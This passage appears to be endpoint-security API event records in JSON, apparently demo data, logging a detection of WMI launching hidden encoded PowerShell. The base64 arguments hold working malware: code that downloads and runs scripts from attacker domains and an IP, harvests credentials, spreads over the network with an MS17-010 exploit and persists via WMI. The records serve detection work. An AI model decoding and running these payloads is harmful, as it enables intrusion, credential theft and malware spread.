CAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8A